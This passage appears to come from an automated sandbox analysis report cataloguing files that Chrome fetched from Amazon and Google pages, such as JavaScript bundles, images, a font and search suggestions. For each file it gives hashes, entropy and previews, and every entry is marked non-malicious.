                                                                                                                                                                          Entropy (8bit):5.399539428872105
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:80013F4D46B39587E446A634F5EBCCF4
                                                                                                                                                                          SHA1:768AAEF09F810DFE75C101A76A7828EA7B5CF15E
                                                                                                                                                                          SHA-256:7CA39CE45204BFDC7841D7B24F5A395C41CA5F4E5871A18E933C4D128C09965B
                                                                                                                                                                          SHA-512:2433F95A32A41BD06830A906BAC2FD6E4832044C3D6DDDD82C013CB0A8EB4EF6B3223BD1BDEC3895F72C041D7AEFC2754EC2A60C8BCB3C153F73FAE73A2BBAEA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/I/81l6Jv+52XL.js?AUIClients/FWCIMAssets
                                                                                                                                                                          Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):43
                                                                                                                                                                          Entropy (8bit):2.9889835948335506
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                          SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                          SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                          SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):28
                                                                                                                                                                          Entropy (8bit):4.066108939837481
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C2123D55130F2FA8031FE9BFFF36E675
                                                                                                                                                                          SHA1:B1F9FA4201BBA320891B92428E08EBDBE97F281A
                                                                                                                                                                          SHA-256:C456CA51EA843B4E09F6102F892EF409440A5C3C3615821B2586EEAD2F680506
                                                                                                                                                                          SHA-512:C962FF1CF2655106BE8456A80B945BFFE9EEFA29224684FA8B68FC8AA0364DADE034FBFF426BF48F8E2C0652F596EF47AFEE2129E40D995CB2B73F1109B13ED9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmsilr5PRTcwRIFDb1LTuESBQ1IOj9B?alt=proto
                                                                                                                                                                          Preview:ChIKBw29S07hGgAKBw1IOj9BGgA=
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4015
                                                                                                                                                                          Entropy (8bit):7.834404640170711
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:4A6147E7D44A69AB341A3E445D5E252C
                                                                                                                                                                          SHA1:6040E51DE5BF3E9BE1598037C14BA66908297520
                                                                                                                                                                          SHA-256:6089A94879B75D348478D2A642D7A1354C3F4C685F514CFDA08D2DB621639599
                                                                                                                                                                          SHA-512:57F117131AD5764FCFA5881604A00FB4334A70FF089B2E382187BBF10BE3B53F582C9CB31474498C567DC9106BF5EA5B504A0F962B293CEECEE69B9E3A3E2091
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................."......".$...$.6*&&*6>424>LDDL_Z_||.............................."......".$...$.6*&&*6>424>LDDL_Z_||.......t...."..........5...........................................................................zrX.?Ky......;.....K..J...s..t.}).....=..V{..M.VK.O....U.9\..}...m.87.Q.c .y..9{.6e...-...eR..t...9...~.....>.v.;M......T0...p'..n.ud...%)../..l........e......y...R{.A.~.K...\8_.o.....}..r8t..)vx.z.....ss.\.Z..]E..${V.<f..C.......=.8-C{...X........)*....3..T|........g..C....l..................2.............................!0.."1.%2A$@EFQUPRV............$.=L8....D....2O.......%...^v..w...v.jVE..U..B../F......@{....O..4.6.j.....V0.`B..q......|'.......v..5.....UC.$...<f..U..".$.id.O....lr.`...d....0..o.58..F..A...^~.`....].CZ..n...E.C...w.{(.{.n.......ug.e..PK...I..|....)b....@..ja....Q.aPl....5.R.7..8.ce.P.....2z9T.`..............\.F.E.e....yQ....7.l.5l......'...o..q.:^#r0.A66.]...._...j!C......~...X.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (607)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):10158
                                                                                                                                                                          Entropy (8bit):5.1802871493858484
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:07A45F05EF21AE19E99F4B71039C95CD
                                                                                                                                                                          SHA1:D3B7399B84358638740DC746EE34FF8236B8E06C
                                                                                                                                                                          SHA-256:DD16175D6A1472CEA68FC92923A98B80C7CBD809877CDFDD1091200FE3118C84
                                                                                                                                                                          SHA-512:82FD00D8484B8365138B95D59413F916029B146059373013EFB5E9760FA5570D7F915A072D8F16563E6C81379DC0B7EA619D7C373CC4F77D1B8387D93282ED28
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:(function(g){var e=window.AmazonUIPageJS||window.P,w=e._namespace||e.attributeErrors,p=w?w("AmazonGatewayHerotatorJS",""):e;p.guardFatal?p.guardFatal(g)(p,window):p.execute(function(){g(p,window)})})(function(g,e,w){g.when("generic-observable").register("gw-herotator-controller",function(g){var f=function(){};return function(e){function y(){h.notifyObservers("delayBegin")}function z(){h.notifyObservers("delayInterrupted")}function w(b){for(var c=0;c<l.length;c++)if(l[c]===b)return c+1}function k(a){a=.a||{};return{delay_complete:a.delay_complete||f,js_ready:a.js_ready||f,fg_loaded:a.fg_loaded||f,mouse_move:a.mouse_move||f,mouse_leave:a.mouse_leave||f,delay_interrupted_timeout:a.delay_interrupted_timeout||f,rotation_complete:a.rotation_complete||f,goto_card:function(a){a!==n&&b.user_navigation(l[a-1])},user_navigation:a.user_navigation||function(a){b=new D(a)},user_interaction:a.user_interaction||function(){b.user_navigation(l[n-1])},stop_autorotation:a.stop_autorotation||function(){b.u
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:MS Windows icon resource - 4 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):17542
                                                                                                                                                                          Entropy (8bit):2.247918084411713
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:CA6619B86C2F6E6068B69BA3AADDB7E4
                                                                                                                                                                          SHA1:C44A1BB9D14385334EB851FBB0AFB19D961C1EE7
                                                                                                                                                                          SHA-256:17D02E2DB6DBEDB95DD449D06868C147AC2C3B5371497BCB9407E75336A99E09
                                                                                                                                                                          SHA-512:30F8F8618BFBCD57925411E6860A10B6AD9A60F2A6B08D35C870EA3F4CEC4692596A937FF1457CEFF5847D5DA2B86CEBA0200706625E28C56A2455E6A8C121D3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.amazon.ae/favicon.ico
                                                                                                                                                                          Preview:......00.... ..%..F... .... ......%........ ......6........ .h....@..(...0...`..... ......%.........................................E...................................................................................................................................................?...................................$...........................................................................................................................................................................................B............................................................................r...P..........................................................................................9...............-........................................................r...................................................>......................................................................$..............................................................................................................................
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (700)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):11064
                                                                                                                                                                          Entropy (8bit):5.4433174798365735
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:B521EB86FBCCEA3698ACAF8809DB4F87
                                                                                                                                                                          SHA1:57C9316B7A1E2C267A9887A952E4FEFEE23FAB8F
                                                                                                                                                                          SHA-256:BB0037C04F550C1C068C192142C71350788550CAED8637F7A102D53DAD85ACB6
                                                                                                                                                                          SHA-512:19B2F06358B763FBE2EA909D8FD1BD31C9E9EC01538F1995CBB60AE5266FBF894AC951445FF8876A6F642881D3CA691595CA9F0B6A7AA0FFEF885D3E89C4E8CA
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:'use strict';mix_d("P13NSCCards__p13n-rvi:p13n-rvi__JiYG2f7T","exports tslib @p/A @c/metrics @c/aui-carousel @c/dom @c/remote-operations @c/scoped-dom @p/a-carousel-framework @c/logger @c/aui-untrusted-ajax @c/browser-operations".split(" "),function(B,u,G,y,H,I,J,K,L,M,N,O){function w(a){return a&&"object"===typeof a&&"default"in a?a:{"default":a}}var n=w(G),P=w(H),Q=w(J),v=w(K),R=w(L),x=w(M),S=w(N),T=w(O),C={},z=function(a,d,b){void 0===d&&(d="");void 0===b&&(b=1);d=a+d;C.hasOwnProperty(d)||(C[d]=.!0,y.count(a,(y.count(a)||0)+b))},U=function(a){z(n["default"].capabilities.mobile?"Card:EERU:SharedLib:mobile:render":"Card:EERU:SharedLib:desktop:render");var d=function(c,e){c={$event:{preventDefault:n["default"].$.noop,stopPropagation:n["default"].$.noop},$target:c.getContent().find('[data-a-tab-name="'+e+'"]'),data:{name:"energyEfficiencyTabSet"}};n["default"].trigger("a:declarative:a-tabs:click",c)},b=function(c,e){var h=c&&c.$event,f=c&&c.data||{},p=f.activeTabName,l=f.modalHeight,r=f
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):2246
                                                                                                                                                                          Entropy (8bit):7.796642773060955
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:FF7162B56D15B9649EDDD780A4A6DFD2
                                                                                                                                                                          SHA1:B104FCF84AA65A8C9FDEA07440AE657D9436EC1E
                                                                                                                                                                          SHA-256:DCD9858942E30537A17C4CDF6508E2272F866184E42162152A4B5325A1A8DEAF
                                                                                                                                                                          SHA-512:6BFAF1E1428066C22CA80382CCAE6DD2FE4BCB0856B7D3E20BD205E72B733E5EA84524947B696FD145DF90E16321C7D394075C73A15FCB3F72EE1FD7D0538CF1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................1QT...!AR....."2Sbqu.....#...$&3Da.BCU..................................................!R...1ABQ.2ar................?...D@...DD....D@...DD....D@....s.../ ..5.|...Dq..ek.5V&.Q.......r.)X.f.sC.....1..?).e...+.5.^y...i}I....`....Ubl...0YT..E4..S........D.e)..M.N..E$'T...+.u.W5.X........5V&.>.'...`.{..ve.P/....&.0..U........W..x...G..V...U.8.|2..]..O.....'..}.f....">.}.A.S...+. .q....g..X..F.'...a.........3..............w..&.c'.jlM..{..]..O..W.e.....vU..m&...g.u...=S..m.5v&.>.......{...5..1..#.....}....o.n..F6;K)....E_#H.<...,..1....9..DEH.........iF...}k.<^..{..m....Q...0..ES#....=...s...3.*..".....qT.v..c...G!.....4.g..G~.H...v..*..".)....5L....jUx9q...W..5U.V.|..H..1. .b..$..tS.z.[..U..[e...s.....M.u.ife.q.......f..j.."..[3.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):1779
                                                                                                                                                                          Entropy (8bit):7.618580132227298
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:E1EBCF5EDB7C9FF71CF0E58D8A040BD3
                                                                                                                                                                          SHA1:F811F86A245395ADB8C9A6604E38BF8587E37659
                                                                                                                                                                          SHA-256:AE90D8D0286FBE0A5D5A8720EA72798EEADB8C9F2101C197FB2601890CC1B261
                                                                                                                                                                          SHA-512:0C492DC805C2C984ED4F146C28F3E8E4347DB7BCC7B7F50C6FDFEF27574EAB8848E304C56537C22B88213B8EAF68E36DE8434875527282EE35751B15F115202C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........{......................................................!1Qq.A.."Ra....2..#$3Br..........................................!1............?...............*"..I.x.8.K...d..5..t....[.<'.o=...4&.....o...c.t......',...um.SA..K.~..7d..~.!0..................+..v......_.=Nc....p..`.m \.}.......8......N....cT...4.x..2O...^.vL.Dq\..............6.-.w.Z.m\$@\.<.......M\i..~X...<..p!L.S..-u...F...k. Z8".j.p{Z..sZGg...t%..,6z..,..E.............!A.j.k._I..TCp|...ej..,v....{.......Z5s>..I$9vIq....~.X........k......#.1Mr.n.4..4.!x....g...z1e.#..a..b...............!.w.QM...~I..[+..b.:B..k.j_.X.1t...U....................;=-.85s..t.|.^Z..........WP...'.#.Ygnz...v.ig.....K8..K.V..qi....x.........>..am.....k@..@7...Y......+.11...&W...4.}.\u..T.4t]..........Dm.=Ja...-{G.g..ky....9.f^....8.3t....2N;..V...
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):2404
                                                                                                                                                                          Entropy (8bit):7.817580772839521
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:9D4A299292E8265E57D7CD0511A28618
                                                                                                                                                                          SHA1:21A94B8EB023A4F674C6B84DA6555214C8D7B18C
                                                                                                                                                                          SHA-256:5AD5F3B54F14782800AB6A6DD2B2E601C4D5EBE38FE7BCCFD2DF09CF2D85C991
                                                                                                                                                                          SHA-512:44D577548DA6BE790201A123991DB95A292C8607885E988FDFE3A69757631FF77C4E9D38ADAC4C177E6DDE1BDFA9F58DD5805C1F7C7B65AB7A5E3CE1E7B99836
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Laptops/Feb_Tablets_1x._SY116_CB659039411_.jpg
                                                                                                                                                                          Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1Q...AUaq..."2Rrt....Sds...%5B...$3ETb.................................................1!...aQ."q.#A..............?...D@...DD....D@...DD....D@.z..(.t...(..pkG.....j..K.m.@..`..........`..i.|z...+...6.Q..YO..F..c...4.>.`.%O.B...g1.2..2u.e........#...0>....q....:o....n.C}5o.....r=.....Jo..L...t.7...G....~...............j......g.UH.a..#..;K.w..4....d.....lH....;s.Q..........X.6z...eT4........6.`...S7.....d...g.SE.....8.Y*.s.*}....N).v.,3C.A.....}wE... ..w,..]A.a..I.m....r6......++..ht.;.T.*..T...*..U..:T.g.I3X.........[X.M.,..`^.(.....[N<..5Em..#.Ak...C../$l..T....V.U.Dq.9.7.......'..4..jh..gy..u.s%S.F....r7.K.wk....-$....n...Y..l.b......a..{..>.ub.|..!Y....8tF.O..u.yD'._7.....p....._........r.]...|XX?jb.......^,.........[.
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (548)
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):15219
                                                                                                                                                                          Entropy (8bit):5.408378924173576
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                          SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                          SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                          SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 29240, version 1.19661
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):29240
                                                                                                                                                                          Entropy (8bit):7.993601718527624
                                                                                                                                                                          Encrypted:true
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:C58D60F633A61A473A746505B4373194
                                                                                                                                                                          SHA1:32110B329B0FF64B386960BCEC4E61964EDEAA17
                                                                                                                                                                          SHA-256:823E37B5143B1B90333E54B872BDB8D40B9F12AD98547D30874FA6350D09A9F3
                                                                                                                                                                          SHA-512:800F34827D7913082944F2F3C58D978CB58042B4C198A0CBD773D676245281D17DC58246BDA9F75504C340C19AA5E5B603BC790184F4FD3655319BAA56720343
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://m.media-amazon.com/images/S/sash/ozb5-CLHQWI6Soc.woff2
                                                                                                                                                                          Preview:wOF2......r8......I8..q...L.......................z......x.`..J.........d..L.6.$..4..\.. ..8. ..[.'q...6.D....2u{..9..6...g.h......a..H.=;......2..A....d..d..K..1*.t.9.t.D.../r.p...c.n...27.0...&.<H.ye.7.=y..H..2-.../}.S.y..6.&...F.$.o.*........Th?.K.o...FB.&...aC...NW.v'...m..e.Y<Sq..I...M..._.}.....+.).F.9KP._R.."aE].ox..E`..G..........>y.I.+J .d..V....4.m%...5.,........{...ED.B.`.1.....NW.9.1.."\T......E.@..bv........H.6i;.@...lS..K..U..j...#.r.f.1.Y.b.0.8.."&....rz...Y.m.:P*JRQ...Z.....jf^.@...i...i.O\...^...J.P......l/.?g.a_3...q...a.!h....x./..M&...}.W&..H.I%.@.p......9.`@C...H.P@..QT.|Q9...7..P......7A,.B^B..'..Z.M..s..N.(b:v...nC*.i...E.E..i..iK5.......?.G.O.m..1...W......+m'.0~.o....+.cG..m>..3.!-.LV.S#...l..^oC...>g.s...G........juHE.p.,t...D..........AL@...t.}o..>a...>.j.....%gO\8....($.?...r..t..ILBZ.@'..6...C,...6.v...Hc.#.MP..V.qY..a$....h74;&Rd".e.n.K.K....@....4TM..O.........r.B4fvI.0<....z.....44).$.{....z..9X.AF....A.p
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):3457
                                                                                                                                                                          Entropy (8bit):7.797916546653529
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:8A8D1725BE716268494687E4FA6D3CAC
                                                                                                                                                                          SHA1:E16F1787D3D6BB34A4F27A82EDF17B21A5DD6950
                                                                                                                                                                          SHA-256:794274AF58AA73F0F278588EB2C520E8FE3C5F97D6B71380E2554F4B5F6592DD
                                                                                                                                                                          SHA-512:4CD88A4170C5E36276A97120B7FBEEA762972B79F1B70BD6EB41D79D50612CF58C488B950B364D31224F4CFFC91002C52769414A3B65618C7118D89E44668902
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF.............C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......t...."........................................6..........................!1..Aa."2.#BQq..CRU.......................................+..........................!.1Q.Aaq."C.23.............?..............y...6NnMtR...`.7.3F.e.=u[.\z=.*+.I./.....0*gc.A.#un..u)o0.9+..~:...,.j.Tu.'.Y.nC...K7......=..O..'U.D..DDDDDDDDDDDDDDDDDDDDDDDDDDDDDHo.r8..8i}......;b...*/".c..m..j*>...4}4.Y._UY....j..^....Pf.....1.k...8;..H..;../j..#o*nm.mKO..~=....p~.7>.K..#....:V.......n..7z+..d...?................................}.E...+Fv..7>..I.^..;....l.%x...f.G...gr..+...i.d...g.M..~..@.%.m....v.....i..l.;.)~..q.il.{.[.b=.......C3.cg........&Y..z..v8m.o~.d.Q&...L.1.....N.;(....Z.k.+l'... ......3."""""""""""""""""""""""""F.. ..\.t..]C..'g...HO...w.@$~...i.(..q...an.o......v?..lZ.u.....u...}d|..}U-.....[.i...I....X.[.2.....V.8.,;..&{
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):4770
                                                                                                                                                                          Entropy (8bit):7.9075482312323935
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:786E751769058A85CB1F8E375ED70ADC
                                                                                                                                                                          SHA1:420A1C6969AA874472522C8687F8FE91C9808F41
                                                                                                                                                                          SHA-256:C90F24CEFF5CBE1CA9F8C8DA809B4EB9C66E226CE7FB12D3731CC67FC2364C02
                                                                                                                                                                          SHA-512:A7E2B5F406C0FE6B3F810A11315586C7E74DFF2FD2796C8058564040313897221F95FC81E7BBDC5359ED15D7EACF6C6A331A2A37E0A98E9319D493DB4BF5EECC
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:......JFIF.............C.................................................."..."*%%*424DD\...C.................................................."..."*%%*424DD\......t....".........................................>..........................!..1A"Qa..2q..#...3BC..$%6Rbct.....................................1.........................!1.."AQaq...2..#34brs.............?.................=5R..y..\...e......q..T....S..Y.X.K..w..<...4.v....].=.....u/i."....'R..J...nA3.......,...:9m=.....\Z..}\=.......9K....0Y{.....t.{.H...D.........2K.._&H.......K'......t....~.^.%n..n.t.x.<.\......e.?.....=.c.....'..U..f&.o.|.~..9..A+.6...q......_.Q.k.X...}....p...vBH.....e..=..E....9....z....!.@.&..zY...\fs.-.*.....p...?79X...g.....v.....sdqm.[.....R+....~5.....WOI..A..L.."$B"$B"$B"$B"$B"$A.*.e.w1...g]k..`.;bH.^}..T..2...~N..[.>.?...\@6\..a......P..GtC..4...,..B.A.N.|....e).d...s..O&M..z.....%.{..?.3A..d......E....rO-.$.#..A.G.+.......a.u..v.0......3Sa.,2...4.s.....
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (6578)
                                                                                                                                                                          Category:downloaded
                                                                                                                                                                          Size (bytes):6583
                                                                                                                                                                          Entropy (8bit):6.093789148051458
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:12FA71376DECFB87909D3A7AF7135FDF
                                                                                                                                                                          SHA1:6D356669767EE6D85D4E3EAC40166C090BF7E548
                                                                                                                                                                          SHA-256:6DCE54BEAFCA2DE60F6ECED819B947389B1F61BEB1E3C2EAA5EA73D72B115A5A
                                                                                                                                                                          SHA-512:10E2C2BEE525FA5FE848CAAF7A6FCE55E00A81EE6E9613967FF62C88854754C1E507D62D01CCF135B97A894ECBB14DFB0457F852B5A5C2BA290E3DD8A65779E3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          URL:https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=HRXVZr75L_Kmi-gPltiDsAw.1725240607625&dpr=1&nolsbt=1
                                                                                                                                                                          Preview:)]}'.[[["labor day sales deals",0,[3,357,760,362,395,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["apple iphone 16 pro max release date",0,[3,357,362,395,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["orioles dean kremer injury",0,[3,357,362,395,396,143],{"zf":33,"zl":8,"zp":{"gs_ss":"1"}}],["cleveland browns",46,[3,357,424,362,395,411,396,143],{"lm":[],"zf":33,"zh":"Cleveland Browns","zi":"Football team","zl":8,"zp":{"gs_ssp":"eJzj4tDP1TcwrChLMmD0EkjOSS1LzUnMS1FIKsovzysGAH32CYM"},"zs":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFAAAAA9CAMAAAANpR4bAAABRFBMVEX/////PAAAAAAxHQD/OAB9dW+moZ0aAAChnJgfAAAXAAAIAACFfni2sq/HxMH/NACQioUrFADf3dzV09Hn5uUtFwDBvbtrYVovGgAlCQCWkIwiAADw7+6uqqbq8PCYIQAABgAFGgAnHAC5FQBCMyX/IABUSD09LB1iWE8pEAAcGwD/VTOrsa9mbGdZPTF3XlSEcGh7f3qOW03nLQDRKwCoIQBoDgAxJxZ1IwCXKwB6QzGFKACboqCsDgDdNgAVGwBnTkKkLQC4MABpJACAGwCcOSBYXFSHPSi8VULQWECbTDvWRyWKNx4JFQDcmY7/lob/YUOUVET/cFc7S0SulI32mozvgG7OgHPbZ1LDm5QhJxk1NizoRiAVEAD/ua//SSDqv7m8bFykbGD/1s9GIQVWIQD/fmj/6uVyNB29RiraUzi
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):121
                                                                                                                                                                          Entropy (8bit):5.12979301549045
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:
                                                                                                                                                                          MD5:2D18A296F15BC61C10C456677E96873D
                                                                                                                                                                          SHA1:3938BE2C4175EEB20246257F62FC3A77E81C1E87
                                                                                                                                                                          SHA-256:25632DBA260E876CBD38291EB4F89F25814475BC545C269EF4A7E3F8B07BA34E
                                                                                                                                                                          SHA-512:7CFA7798243F9DC315F1FC12ECEB42E9B3A24A12628AB71E7AAF1F0BD626EBD829E9C6E93F6A03F010023054217E37AF6E9C085622B7FA3DEFAC3151F7666E9D
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                          Preview:)]}'.22;["JxXVZqSuO972i-gP8YKC8AI","2069"]d;[12,null,"0"]2;[]c;[2,null,"0"]1b;<div jsname="Nll0ne"></div>c;[9,null,"0"]0;
                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
